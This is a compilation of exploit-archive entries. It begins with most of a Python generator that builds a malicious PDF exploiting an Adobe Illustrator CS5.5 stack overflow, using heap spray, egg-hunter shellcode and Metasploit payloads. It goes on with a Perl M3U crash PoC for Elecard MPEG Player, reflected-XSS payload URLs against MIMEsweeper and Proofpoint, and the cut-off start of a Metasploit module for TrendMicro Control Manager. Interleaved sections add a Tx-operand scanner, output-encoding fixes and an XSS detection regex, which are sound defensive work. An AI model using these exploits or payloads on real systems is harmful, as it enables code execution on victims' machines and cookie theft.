0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28,0x29,0x2A,0x2B,0x2C,0x2D,0x2E,0x2F,
0x30,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3A,0x3B,0x3C,0x3D,0x3E,0x3F,
0x40,0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,
0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,0x5B,0x5C,0x5D,0x5E,0x5F,
0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6C,0x6D,0x6E,0x6F,
0x70,0x71,0x72,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7A,0x7B,0x7C,0x7D,0x7E,0x00,
0x80,0x00,0x82,0x83,0x84,0x85,0x86,0x87,0x88,0x89,0x8A,0x8B,0x8C,0x00,0x00,0x00,
0x00,0x91,0x92,0x93,0x94,0x95,0x96,0x97,0x98,0x99,0x9A,0x9B,0x9C,0x00,0x00,0x9F,
0x20,0xA1,0xA2,0xA3,0xA4,0xA5,0xA6,0xA7,0xA8,0xA9,0xAA,0xAB,0xAC,0x2D,0xAE,0xAF,
0xB0,0xB1,0xB2,0xB3,0xB4,0xB5,0xB6,0xB7,0xB8,0xB9,0xBA,0xBB,0xBC,0xBD,0xBE,0xBF,
0xC0,0xC1,0xC2,0xC3,0xC4,0xC5,0xC6,0xC7,0xC8,0xC9,0xCA,0xCB,0xCC,0xCD,0xCE,0xCF,
0xD0,0xD1,0xD2,0xD3,0xD4,0xD5,0xD6,0xD7,0xD8,0xD9,0xDA,0xDB,0xDC,0xDD,0xDE,0xDF,
0xE0,0xE1,0xE2,0xE3,0xE4,0xE5,0xE6,0xE7,0xE8,0xE9,0xEA,0xEB,0xEC,0xED,0xEE,0xEF,
0xF0,0xF1,0xF2,0xF3,0xF4,0xF5,0xF6,0xF7,0xF8,0xF9,0xFA,0xFB,0xFC,0xFD,0xFE,0xFF]
invalid = [ i for i in xrange(0,0xff+1) if cmap[i] != i and i>0x1f]
def getXImage(width, height, fill='\x90', tail='\xcc'):
'''
[ a b c d tx ty ] llx lly urx ury h w bits ImageType AlphaChannelCount reserved bin-ascii ImageMask XI
Arguments to the XI operator specify the location and size of the image, its
pixel bit depth, color type, and other attributes
The image matrix maps the unit square of user space, bounded by
(0, 0) and (1, 1) in user space, to the boundary of the source image in
image space.
'''
doc = '''0 A
u
0 O
0 g
0 J 0 j 1 w 10 M []0 d
0 XR
%AI5_File:
%AI5_BeginRaster
[$width$ 0 0 $height$ 0 0] 0 0 $width$ $height$ $width$ $height$ 8 1 0 0 $bin_ascii$ 0
%%BeginData: $size$
XI
$data$
%%EndData
XH
%AI5_EndRaster
F
U
'''
bin_ascii = 1 #binary
doc = doc.replace('$width$','%d'%width)
doc = doc.replace('$height$','%d'%height)
doc = doc.replace('$bin_ascii$','%d'%bin_ascii)
doc = doc.replace('$size$','%d'%(width*height))
data = (fill*(width*height))
data = data[:width*height-len(tail)]+tail
if bin_ascii == 0:
data = data.encode('hex')
data_formated = ''
for i in xrange(0,len(data)+62,62):
data_formated += '%'+data[i:i+62]+'\n'
data = data_formated
doc = doc.replace('$data$',data)
return doc
def makeASCIICode(msfpayload):
msfpayload = Popen('msfpayload3.5 %s R'%msfpayload, shell=True, stdout=PIPE)
msfencode = Popen("msfencode3.5 BufferRegister=EAX -e x86/alpha_mixed -b '%s' -t raw"%''.join(['\\x%02x'%x for x in invalid]),
shell=True,
stdin=msfpayload.stdout,
stdout=PIPE)
code = msfencode.communicate()[0]
return code
def mkAIPrivate(options):
baseai = '''
%!PS-Adobe-3.0
%%Creator: Adobe Illustrator(TM) 3.2
%%AI8_CreatorVersion: 15.0.2
%AI5_FileFormat 11.0
%%For: (Administrator) ()
%%Title: (thafile.ai)
%%CreationDate: 1/21/2011 12:32 PM
%%Canvassize: 16383
%%BoundingBox: 29 -389 198 75
%%DocumentProcessColors: Black
%%DocumentFonts: MyriadPro-Regular
%%DocumentNeededFonts: MyriadPro-Regular
%%DocumentNeededResources: procset Adobe_packedarray 2.0 0
%%+ procset Adobe_cshow 1.1 0
%%+ procset Adobe_customcolor 1.0 0
%%+ procset Adobe_typography_AI3 1.0 1
%%+ procset Adobe_pattern_AI3 1.0 0
%%+ procset Adobe_Illustrator_AI3 1.0 1
%AI3_ColorUsage: Color
%AI3_TemplateBox: 298 -421 298 -421
%AI3_TileBox: -8.35986 -816.9453 603.6406 -24.9448
%AI3_DocumentPreview: None
%%PageOrigin:-8 -817
%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9
%AI9_Flatten: 1
%AI12_CMSettings: 00.MS
%%EndComments
%%BeginProlog
%%IncludeResource: procset Adobe_packedarray 2.0 0
Adobe_packedarray /initialize get exec
%%IncludeResource: procset Adobe_cshow 1.1 0
%%IncludeResource: procset Adobe_customcolor 1.0 0
%%IncludeResource: procset Adobe_typography_AI3 1.0 1
%%IncludeResource: procset Adobe_pattern_AI3 1.0 0
%%IncludeResource: procset Adobe_Illustrator_AI3 1.0 1
%%EndProlog
%%BeginSetup
%%IncludeFont: MyriadPro-Regular
Adobe_cshow /initialize get exec
Adobe_customcolor /initialize get exec
Adobe_typography_AI3 /initialize get exec
Adobe_pattern_AI3 /initialize get exec
Adobe_Illustrator_AI3 /initialize get exec
[
39/quotesingle 96/grave 128/Euro 130/quotesinglbase/florin/quotedblbase/ellipsis
/dagger/daggerdbl/circumflex/perthousand/Scaron/guilsinglleft/OE 145/quoteleft
/quoteright/quotedblleft/quotedblright/bullet/endash/emdash/tilde/trademark
/scaron/guilsinglright/oe/dotlessi 159/Ydieresis /space 164/currency 166/brokenbar
168/dieresis/copyright/ordfeminine 172/logicalnot/hyphen/registered/macron/ring
/plusminus/twosuperior/threesuperior/acute/mu 183/periodcentered/cedilla
/onesuperior/ordmasculine 188/onequarter/onehalf/threequarters 192/Agrave
/Aacute/Acircumflex/Atilde/Adieresis/Aring/AE/Ccedilla/Egrave/Eacute
/Ecircumflex/Edieresis/Igrave/Iacute/Icircumflex/Idieresis/Eth/Ntilde
/Ograve/Oacute/Ocircumflex/Otilde/Odieresis/multiply/Oslash/Ugrave
/Uacute/Ucircumflex/Udieresis/Yacute/Thorn/germandbls/agrave/aacute
/acircumflex/atilde/adieresis/aring/ae/ccedilla/egrave/eacute/ecircumflex
/edieresis/igrave/iacute/icircumflex/idieresis/eth/ntilde/ograve/oacute
/ocircumflex/otilde/odieresis/divide/oslash/ugrave/uacute/ucircumflex
/udieresis/yacute/thorn/ydieresis
TE
%AI3_BeginEncoding: _MyriadPro-Regular MyriadPro-Regular
[/_MyriadPro-Regular/MyriadPro-Regular 0 0 1 TZ
%AI3_EndEncoding AdobeType
%%EndSetup
$HEAPSPRAY$
u
0 To
1 0 0 1 63.9058 -54.9058 0 Tp
TP
1 0 0 1 63.9058 -54.9058 Tm
0 Tr
0 O
0 0 0 1 k
4 M
/_MyriadPro-Regular 12 Tf
100 Tz
0 Tt
0 0 Tl
0 Tc
($PATTERN$) Tx 1 0 Tk
TO
U
%%PageTrailer
gsave annotatepage grestore showpage
%%Trailer
Adobe_Illustrator_AI3 /terminate get exec
Adobe_pattern_AI3 /terminate get exec
Adobe_typography_AI3 /terminate get exec
Adobe_customcolor /terminate get exec
Adobe_cshow /terminate get exec
Adobe_packedarray /terminate get exec
%%EOF
'''
    #configure token and search code snippet
    token = 0x494c4546
    if options.w7:
        #Win7 In w7 the environment memory is 0x10000bytes long!
        msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'
        baseai = baseai.replace('$HEAPSPRAY$','')
        jmp_addr = 0x00001FF01
        write_addr = 0x0001FF01
    elif options.xp:
        #XPSP3
        msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'
        baseai = baseai.replace('$HEAPSPRAY$','')
        jmp_addr = 0x10F00
        write_addr = 0x10F00
    elif options.osx:
        code = Popen('msfpayload3.5 osx/x86/exec CMD=/Applications/Calculator.app/Contents/MacOS/Calculator EXITFUNC=process R', shell=True, stdout=PIPE).communicate()[0]
        baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\x90',tail='\xcc'+code+'\xcc')*300 )
        payload = "A"*284
        payload += struct.pack("<L", 0x31000100)
        #Write the string in octal form
        ai_data = baseai.replace('$PATTERN$', ''.join(['\\%o'%ord(i) for i in payload]))
        return ai_data
    elif options.multi:
        msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=seh'
        jmp_addr = 0x18e41111
        write_addr = 0xFFFF #Segfault
        #configure token and search code snippet
        search = '\x80\x79\xff\x01' #CMP BYTE [ECX-1],1
        search += '\x74\x18' #JZ fixstack
        search += '\xc6\x41\xff\x01' #MOV BYTE [ECX-1],1
        search += '\x58' #search: pop EAX
        search += '\x3D'+struct.pack('<L',token) #cmp EAX, $token
        search += '\x75\xF8' #jnz %search
        search += '\x89\xe0' #mov eax,esp
        search += '\x81\xec'+struct.pack("<L",0x1000) #sub esp, 0x1000
        search += '\x89\xe5' #mov ebp,esp
        search += '\xFF\xD0' #CALL EAX
        ##Second crash fix stack
        # Search for stack signature (Tested in 15.0.0 15.0.1 15.0.2)
        # 00000045
        # 00000001
        # 00000000
        # 00000045
        search += '\x81\xc4'+struct.pack("<L",0x1000) #add esp, 0x1000
        search += '\x58' #POP EAX
        search += '\x40' #INC EAX
        search += '\x83\xF8\x46' #CMP EAX,46
        search += '\x75\xF9' #JNE SHORT loop
        ###
        search += '\x58' #POP EAX
        search += '\x40' #INC EAX
        search += '\x83\xF8\x02' #CMP EAX,02
        search += '\x75\xF9' #JNE SHORT loop
        ###
        search += '\x58' #POP EAX
        search += '\x40' #INC EAX
        search += '\x83\xF8\x01' #CMP EAX,01
        search += '\x75\xF9' #JNE SHORT loop
        ###
        search += '\x58' #POP EAX
        search += '\x40' #INC EAX
        search += '\x83\xF8\x46' #CMP EAX,46
        search += '\x75\xF9' #JNE SHORT loop
        #Fix frame and return
        search += '\x83\xEC\x1C' #SUB ESP,1C
        search += '\x5d' #POP EBP
        search += '\xc3' #RET
        baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\x90',tail=search)*300 )
    else:
        #DEBUG
        def pattern(size):
            def _pattern():
                for i in xrange(ord('a'),ord('z')+1):
                    for j in xrange(ord('0'),ord('9')+1):
                        for k in xrange(ord('A'),ord('Z')+1):
                            for h in xrange(ord('0'),ord('9')+1):
                                yield chr(i)
                                yield chr(j)
                                yield chr(k)
                                yield chr(h)
            return ''.join(list(_pattern())[:size])
        p = pattern(3000)
        ai_data = baseai.replace('($PATTERN$)', '('+p+')').replace('$HEAPSPRAY$',getXImage(1020,1024)*20)
        return ai_data
    #prepare shellcode..
    if options.payload:
        msfpayload = args[1]
    code = makeASCIICode(msfpayload)
    search = '\x58' #search: pop EAX
    search += '\x3D'+struct.pack('<L',token) #cmp EAX, $token
    search += '\x75\xF8' #jnz %search
    search += '\x89\xe0' #mov eax,esp
    search += '\x89\xe5' #mov ebp,esp
    search += '\xFF\xD0' #CALL EAX
    payload = search
    payload += 'A'*(268 - len(payload))
    payload += struct.pack('<L',jmp_addr) #offset 268
    payload += 'B'*(352 - len(payload))
    payload += struct.pack('<L', write_addr) #offset 352 (originally a heap address)
    payload += 'C'*(376 - len(payload))
    payload += struct.pack('<L',token) #offset 376
    payload += code #offset 380
    assert len(payload)<=0x3000, 'Payload too long!, it may hit the end of the stack'
    #Double check it doesn't have invalid chars...
    for c in search:
        assert not ord(c) in invalid, 'c:%s is in %s'%('%02x'%ord(c),['\\x%02x'%x for x in invalid])
    #Write the string in octal form
    ai_data = baseai.replace('$PATTERN$', ''.join(['\\%o'%ord(i) for i in payload]))
    #ai_data holds the ai private data to be inserted in the pdf shell
    return ai_data

def mkPDFShell(ai_data):
    #The document
    doc = PDFDoc()
    #font
    font = PDFDict()
    font.add('Name', PDFName('F1'))
    font.add('Subtype', PDFName('Type1'))
    font.add('BaseFont', PDFName('Helvetica'))
    #name:font map
    fontname = PDFDict()
    fontname.add('F1',font)
    #resources
    resources = PDFDict()
    resources.add('Font',fontname)
    #contents
    contents= PDFStream({},'BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito Pedefeon!) Tj ET')
    doc.add(contents)
    #begin illustrator bit
    private = PDFDict()
    illustrator = PDFDict()
    #slice the private data in 64k packs
    data = ai_data
    compress = {}
    chunk_size = 0xffff*20
    for i in xrange(0,len(data)/chunk_size+1):
        priv_data = PDFStream({'Filter': '/FlateDecode'},data[chunk_size*i:chunk_size*(i+1)].encode('zlib'))
        hsh = hashlib.md5(priv_data.stream)
        if not hsh.hexdigest() in compress.keys():
            doc.add(priv_data)
            ref = PDFRef(priv_data)
            compress[hsh.hexdigest()] = ref
        else:
            #reuse the reference of the identical chunk already in the document
            ref = compress[hsh.hexdigest()]
        private.add('AIPrivateData%d'%(i+1),ref)
    private.add('NumBlock',PDFNum(len(data)/0xffff+1))
    private.add('ContainerVersion',PDFNum(15.0))
    private.add('CreatorVersion',PDFNum(15.0))
    private.add('RoundtripVersion',PDFNum(15.0))
    illustrator.add('LastModified',PDFString('D:20110202124811-07\'00\''))
    illustrator.add('Private',PDFRef(private))
    doc.add(private)
    doc.add(illustrator)
    #page
    page = PDFDict()
    page.add('Type',PDFName('Page'))
    page.add('Resources',resources)
    page.add('Contents', PDFRef(contents))
    page.add('PieceInfo',PDFDict({'Illustrator': PDFRef(illustrator)}))
    doc.add(page)
    #pages
    pages = PDFDict()
    pages.add('Type', PDFName('Pages'))
    pages.add('Kids', PDFArray([PDFRef(page)]))
    pages.add('Count', PDFNum(1))
    #add parent reference in page
    page.add('Parent',PDFRef(pages))
    doc.add(pages)
    #catalog
    catalog = PDFDict()
    catalog.add('Type', PDFName('Catalog'))
    catalog.add('Pages', PDFRef(pages))
    doc.add(catalog)
    doc.setRoot(catalog)
    return str(doc)

if __name__ == '__main__':
    parser = optparse.OptionParser(description='Adobe Illustrator File Format Tx operator Stack Overflow')
    parser.add_option('--debug', action='store_true', default=False, help='For debugging')
    parser.add_option('--multi', action='store_true', default=False, help='Heapspraying for multitarget')
    parser.add_option('--w7', action='store_true', default=False, help='For Windows7')
    parser.add_option('--xp', action='store_true', default=False, help='For Windows XP (generic)')
    parser.add_option('--osx', action='store_true', default=False, help='For OSX (tested on plain leopard)')
    parser.add_option('--payload', action='store_true', default=False, help="Metasploit payload. Ex. 'windows/exec CMD=calc.exe'")
    parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')
    (options, args) = parser.parse_args()
    if not options.w7 + options.xp + options.debug + options.multi + options.osx + options.doc == 1:
        print 'Try --help'
        exit(-1)
    elif options.doc:
        print __doc__
        exit(0)
    ai_data = mkAIPrivate(options)
    print mkPDFShell(ai_data)
#f/
Adobe Illustrator CS5.5 memory corruption proof of concept exploit that spawns a calculator.
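The generator above writes its payload into the Illustrator text object as a PostScript literal string, encoding every byte as a `\ddd` octal escape, and feeds it to the Tx operator. A file scanner can therefore decode the string operand that precedes Tx and flag operands far longer than any text run a real drawing would contain. The following is an added detection example, not part of the exploit or of Adobe's format tools; the sample fragments are constructed, and the 256-byte threshold is an assumed limit chosen for illustration.

```python
import re

# Named PostScript string escapes; \ddd octal escapes are handled separately.
PS_NAMED_ESCAPES = {
    'n': 0x0a, 'r': 0x0d, 't': 0x09, 'b': 0x08, 'f': 0x0c,
    '\\': 0x5c, '(': 0x28, ')': 0x29,
}


def decode_ps_string(body):
    """Decode the inside of a PostScript literal string "( ... )" to bytes.

    Supports \\ddd octal escapes (what the generator emits with '\\%o'),
    the named escapes above, and backslash-newline line continuation.
    """
    out = bytearray()
    i, n = 0, len(body)
    while i < n:
        c = body[i]
        if c != '\\':
            out.append(ord(c) & 0xff)
            i += 1
            continue
        i += 1                                   # skip the backslash
        if i >= n:
            break                                # dangling backslash: ignore
        c = body[i]
        if c in '01234567':
            j = i
            while j < n and j - i < 3 and body[j] in '01234567':
                j += 1                           # up to three octal digits
            out.append(int(body[i:j], 8) & 0xff)
            i = j
        elif c in PS_NAMED_ESCAPES:
            out.append(PS_NAMED_ESCAPES[c])
            i += 1
        elif c == '\n':
            i += 1                               # continuation, emits nothing
        else:
            out.append(ord(c) & 0xff)            # unknown escape keeps the char
            i += 1
    return bytes(out)


def read_ps_string(text, start):
    """Return (body, end) for the string whose '(' sits at text[start].

    Unescaped parentheses nest, as in PostScript; escaped ones do not count.
    """
    depth, i, n = 0, start, len(text)
    while i < n:
        c = text[i]
        if c == '\\':
            i += 2
            continue
        if c == '(':
            depth += 1
        elif c == ')':
            depth -= 1
            if depth == 0:
                return text[start + 1:i], i + 1
        i += 1
    raise ValueError('unterminated PostScript string at offset %d' % start)


TX_FOLLOWS = re.compile(r'\s*Tx\b')


def tx_operand_lengths(ai_text):
    """Decoded byte length of every string operand passed to Tx."""
    lengths, i = [], 0
    while True:
        start = ai_text.find('(', i)
        if start < 0:
            return lengths
        body, end = read_ps_string(ai_text, start)
        if TX_FOLLOWS.match(ai_text, end):       # the operator right after it
            lengths.append(len(decode_ps_string(body)))
        i = end


def oversized_tx_operands(ai_text, limit=256):
    """Lengths of Tx operands above `limit` (assumed threshold)."""
    return [n for n in tx_operand_lengths(ai_text) if n > limit]


# Constructed samples mirroring the text object in the template above.
BENIGN_AI = '/_MyriadPro-Regular 12 Tf\n(Hello \\(world\\)) Tx 1 0 Tk\nTO\n'
OVERSIZED_AI = ('/_MyriadPro-Regular 12 Tf\n('
                + ''.join('\\%o' % b for b in b'A' * 300)
                + ') Tx 1 0 Tk\nTO\n')

if __name__ == '__main__':
    for name, sample in (('benign', BENIGN_AI), ('oversized', OVERSIZED_AI)):
        print(name, tx_operand_lengths(sample), oversized_tx_operands(sample))
```

The decoder is the part that matters: a scanner that only measures the raw string between the parentheses would be fooled by the octal encoding in one direction and by long escape sequences in the other, so the length check has to run on the decoded bytes.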
aBo MoHaMeD/Elecard MPEG Player 5.5 Buffer Overflow ( na)
#!/usr/bin/perl -w
########################################################################
#Program : Elecard MPEG Player
#Version : 5.5 build 15884.081218
#website : http://www.elecard.com/download/index.php
#Download : http://www.elecard.com/ftp/pub/mpeg/player/EMpgPlayer.zip
#Type : * (.M3U) Buffer Overflow POC
########################################################################
#EAX 00000000
#ECX 41414141
#EDX 7C9037D8 ntdll.7C9037D8
#EBX 00000000
#ESP 0012BE40
#EBP 0012BE60
#ESI 00000000
#EDI 00000000
#EIP 41414141
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDF000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0
#EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
#MM0 0020 0202 0000 001B
#MM1 015A F2BC 8986 2BC0
#MM2 011C 0000 4020 027F
#MM3 0000 0000 804D A735
#MM4 BADB 0D00 BF83 15E6
#MM5 8A1B EAB8 0000 0005
#MM6 0000 0000 0000 0000
#MM7 D1B7 1758 E219 6000
my $file="boom.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://"."A" x 72850;
close($FILE);
print "$file has been created \n";
Elecard MPEG Player version 5.5 .m3u file stack buffer overflow denial of service proof of concept exploit.
Anastasios Monachos/MIMEsweeper For SMTP 5.5 Cross Site Scripting ( na)
Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflected XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]
[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>
[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor of evaluation progress: v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor regarding the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave a notice for public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested postponing disclosure until the patch is public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested a demo license to verify the fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date
MIMEsweeper for SMTP version 5.5 Personal Message Manager suffers from multiple cross site scripting vulnerabilities.
Karan Khosla/Proofpoint Protection Server 5.5.5 Cross Site Scripting ( na)
Sense of Security - Security Advisory - SOS-11-005
Release Date. 03-May-2011
Last Update. -
Vendor Notification Date. 28-Apr-2011
Product. Proofpoint Protection Server
Platform. Appliance
Affected versions. 5.5.5 (verified), and possibly others
Severity Rating. Medium
Impact. Cookie/credential theft, impersonation, loss of confidentiality
Attack Vector. Remote without authentication
Solution Status. Vendor patch
CVE reference. Not yet assigned
Details.
The Proofpoint Protection Server offers anti-spam and anti-virus,
connection management, email firewall and policy enforcement features.
A Cross-Site Scripting (XSS) vulnerability has been discovered in the
Proofpoint Protection Server where input is passed to the query string
of process.cgi. This has occurred as a result of the application not
properly filtering HTML tags which allows malicious JavaScript to be
embedded. When input is incorrectly validated and not properly sanitised
and then displayed in a web page, attackers can trick users into viewing
the web page and causing malicious code to be executed.
Proof of Concept.
The Cross-Site Scripting vulnerability can be triggered by using the
following URL:
https://proofpoint.yyy.com.au:10020/enduser/process.cgi?cmd=release&
recipient=xxx@yyy.com.au&
msg_id=%28MDYzMjU0NTJkYTQ0OWRhYjJlNWY1MjBhNzc5MDEwODlkZGY5OGIzMTc1MGI=%29&
locale=enus&x=580&y=470&displayprogress=t%22%20
onmouseover=%22alert%281%29%22%20name=%22frame_display%22%20id=%22
frame_display%22%20NORESIZE%20SCROLLING=%22no%22%20/%3E%3C!--
Where: proofpoint.yyy.com.au:10020 is the internal FQDN of the Proofpoint
appliance (this is the link received in the 'quarantine mail alert' email)
Note: the recipient and msg_id parameters do not need to be valid (exist on
Proofpoint) to trigger the vulnerability.
Solution.
The vendor has advised that 'Patch 1084' is now available,
and should be applied to fix this issue.
Discovered by.
Karan Khosla - Sense of Security Labs.
About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-005.pdf
Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
Proofpoint Protection Server version 5.5.5 suffers from a cross site scripting vulnerability.
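The two advisories above show the same defect in two output contexts: MIMEsweeper reflects the `email` parameter into element text, so a `<script>` tag runs, while Proofpoint reflects `displayprogress` inside a quoted attribute, so a single `"` closes the attribute and an `onmouseover=` handler follows. The following is an added example, not code from either vendor: the page templates are constructed stand-ins for the real markup, the vulnerable and fixed rendering sit side by side for both contexts, and a small request-log check picks out parameters carrying either payload shape. Both PoC URLs are taken from the advisories (the MIMEsweeper host is replaced with a constructed name); the benign URL is constructed.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl


def render_text_unsafe(email):
    """Vulnerable: the query value is concatenated straight into element text."""
    return '<p>A reminder was sent to %s</p>' % email


def render_text_safe(email):
    """Fixed: HTML-encode the value before placing it in element text."""
    return '<p>A reminder was sent to %s</p>' % html.escape(email, quote=True)


def render_attr_unsafe(displayprogress):
    """Vulnerable: the value lands inside a double-quoted attribute unencoded."""
    return '<frame displayprogress="%s" name="frame_display" />' % displayprogress


def render_attr_safe(displayprogress):
    """Fixed: quote=True turns " into &quot;, so the attribute cannot be closed early."""
    return ('<frame displayprogress="%s" name="frame_display" />'
            % html.escape(displayprogress, quote=True))


# Detection side: the reflected-XSS shapes both advisories use, matched against
# the decoded value of every query parameter: a <script> tag, a quote followed
# by an on*= handler attribute, or a javascript: URL.
XSS_MARKERS = re.compile(r'<\s*script|["\']\s*on\w+\s*=|javascript:', re.I)


def reflected_xss_params(url):
    """Names of the query parameters whose decoded value matches XSS_MARKERS."""
    query = urlsplit(url).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if XSS_MARKERS.search(value)]


# Sample requests (see the lead-in for provenance).
MIMESWEEPER_URL = ('https://pmm.example.com/MSWPMM/Common/Reminder.aspx'
                   '?email=test<script>alert(document.cookie)</script>')
PROOFPOINT_URL = (
    'https://proofpoint.yyy.com.au:10020/enduser/process.cgi?cmd=release&'
    'recipient=xxx@yyy.com.au&'
    'msg_id=%28MDYzMjU0NTJkYTQ0OWRhYjJlNWY1MjBhNzc5MDEwODlkZGY5OGIzMTc1MGI=%29&'
    'locale=enus&x=580&y=470&displayprogress=t%22%20'
    'onmouseover=%22alert%281%29%22%20name=%22frame_display%22%20id=%22'
    'frame_display%22%20NORESIZE%20SCROLLING=%22no%22%20/%3E%3C!--')
BENIGN_URL = ('https://pmm.example.com/MSWPMM/Common/SignIn.aspx'
              '?tbEmailAddress=user@example.com')

if __name__ == '__main__':
    print(render_text_unsafe('test<script>alert(1)</script>'))
    print(render_text_safe('test<script>alert(1)</script>'))
    print(render_attr_unsafe('t" onmouseover="alert(1)"'))
    print(render_attr_safe('t" onmouseover="alert(1)"'))
    for url in (MIMESWEEPER_URL, PROOFPOINT_URL, BENIGN_URL):
        print(reflected_xss_params(url) or 'clean', url[:60])
```

Note that `quote=True` is what makes the attribute case safe; `html.escape` with `quote=False` neutralises the MIMEsweeper text-context payload but leaves the Proofpoint attribute breakout intact, which is why output encoding has to be chosen per context rather than applied once at input time.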
blue/TrendMicro Control Manager 5.5 Buffer Overflow ( na)
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name' => "TrendMicro Control Manager <= v5.5 CmdProcessor.exe Stack Buffer Overflow",
      'Description' => %q{
        This module exploits a vulnerability in the CmdProcessor.exe component of Trend
        Micro Control Manager up to version 5.5.
        The specific flaw exists within CmdProcessor.exe service running on TCP port
        20101. The vulnerable function is the CGenericScheduler::AddTask function of
        cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,
        controlled data is copied into a 256-byte stack buffer. This can be exploited
        to execute remote code under the context of the user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Luigi Auriemma', #Initial discovery
          'Blue', #Metasploit
        ],
      'References' =>
        [
          ['CVE', '2011-5001'],
          ['OSVDB', '77585'],
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-345/']
        ],
      'Payload' =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process',
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            # TCM 5.5 cannot be installed in Win2k3 SP0-SP1, Win2k8, or XP
            'Windows 2003 Server SP2 (DEP Bypass)',
            {
              'Ret' => 0x666b34c8, # TMNotify.dll stack pivot
              'Offset' => 5000
            }
          ],
        ],
      'Privileged' => false,
      'DisclosureDate' => "Dec 07 2011",
      'DefaultTarget' => 0))

    register_options(
      [
